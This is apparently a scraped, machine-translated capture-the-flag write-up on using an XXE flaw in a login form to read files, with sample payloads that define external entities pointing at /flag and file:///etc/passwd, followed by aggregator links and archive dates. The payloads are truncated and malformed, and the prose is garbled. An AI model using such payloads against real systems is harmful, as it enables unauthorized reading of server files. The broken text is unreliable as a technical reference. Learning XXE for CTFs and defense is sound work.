XXE read any file (contents when an output xml parsing)

Others 2019-11-25 00:14:05 views: null

Exploit the vulnerability to read files XXE

Reference: https://www.jianshu.com/p/4fc721398e97

First, find the login source code as follows:

The title can take advantage of the vulnerability to read files XXE

First log in with Burp Suite Ethereal:

Then read the file structure XXE

Statement is as follows:

<?xml version = "1.0"?>

<!DOCTYPE ANY [

<!ENTITY f SYSTEM "/flag">

<user>

</user

template:

<?xml version = "1.0"?>

<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">

Guess you like

Origin www.cnblogs.com/clqnotes/p/11922146.html

XXE read any file (contents when an output xml parsing)

【1day】Hongjing OA SmsAcceptGSTXServlet interface XXE vulnerability learning - can read any file

Java read file contents

When configuring url in xml file, "&" character causes parsing error

The contents of the input into the text, the file is read, saved to a file output, the computing program running time (c ++)

Digester parsing XML file

Python read the contents of the file yaml

Read the contents of the file --open function

python read the file and write the contents to a file

nio read the file, the output file

could not read pom.xml maven pom.xml project suddenly being given, jsp file contents also throw an exception

VAuditDemo-Read any file

C# parsing XML file

Python print output will be saved to the specified file contents

XPath read xml file

html xml file read

XML read file

Java read XML file

When springboot+mybatis is integrated, scan the xxx.xml file in any path

Read the contents of a text file method Android

python - 7. read the contents of the file

pandas to read the file contents dataframe method

python parametric read the contents of the file yaml

python read the file contents of the specified line

Examples of the file to read the contents of the collection set

Read the contents of the file as input to the java program

[C#] Read the contents of the ini configuration file

Read the contents of a file - reading a binary file, and then save the file to another

How to disable XInclude when parsing XML?

Recommended

The “35-year-old curse” of Chinese coders

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Ranking

Methods and Practices of Manufacturing Data Quality Improvement

Serial port upgrade program for efficient transmission of large firmware

Use KITTI to run LIOSAM and complete the EVO evaluation

Calling methods on string literals (Java)

ActiveMQ and Spring integration (4)

You have to know the HTTPS! ! !

PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)

el-upload brings request background

UVA - 1204 Fun Game-like pressure dp

2019-12-28

Daily

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)